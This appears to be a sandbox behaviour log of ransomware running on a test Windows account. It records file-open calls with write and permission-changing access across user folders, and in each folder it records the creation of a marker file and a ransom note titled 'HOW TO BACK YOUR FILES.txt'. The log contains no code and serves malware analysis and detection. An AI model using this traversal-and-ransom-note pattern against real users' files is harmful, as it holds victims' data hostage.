Create C:\Users\FD1HVy\Music\ddgoRP\nMGREfCTbmqLn8Nm.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\q8tNQuca9CLizMc.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\ysJ3TUUOloNGuy.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\atFhmMZ\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\atFhmMZ\Iq3Mk4kIcDleAb4.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\atFhmMZ\jG41f5VsquvTqCZwY.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\atFhmMZ\kQd6LBtQrAN6lnmGB.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\atFhmMZ\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\3yy255AddCwO6CDe\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\3yy255AddCwO6CDe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Links\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Favorites\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Favorites\Bing.url desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Favorites\Links\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Downloads\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\-33gPV9.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\-3XRYUkfmqMg59Ll.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\0t09mDlRL QY9tqd.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\2qoDue.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\35ULey8kyqPR4IR.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\3nYDBBYQqc5.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\7YrvN5qTysy.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bt9IDQZ.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\Database1.accdb desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\DGflni.doc desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\dsWpol B2cKgrldiUL.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\dWc4-70S.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\H8Y_brCG8G6csUiI.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\hYjJeP1.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\IM_wRbLvbAhaK_.csv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\NmNfuGn Py.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\o-SO_hvBok5gl9ouLbt.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\oU6X5HPu8.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\p7hRtqlqwGh-7qLSqxAb.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\PRU9 H0QOwabp888.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\suKaNdk0NBwOysu cjX.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\xT4l_ROJLA_IpK4d4.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\b3 L_8Aww3.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\c9HUgPMn.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\h_uO.xls desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\SBk5RPRd5SSmk r6MsO.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\5UIIwxxuSCwYbi_fDL.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\6lADbwLmhMb6k2_hQ.csv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\9VM43enKtBNnJ.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\HLSmokW YeF9u.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\I4xTf-C.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\V aDNuCa.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\1pNb.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\gE99JrIwutT0tFxNz.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\GVj2hhi0gvWSRVrHTCP.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\MRzyzETcP.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\Q7T abSZv.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\r c_-ee.xls desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\_kq3J7tr.doc desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\-aRcJA7jEmHzJ7r.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\81WfwdP.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\fHQ QkkX1TmC5OV.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\mqnlW3rVySKpkYtm8O.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\OL28qnWw4 WVd5.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\DKUItMdMv.csv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
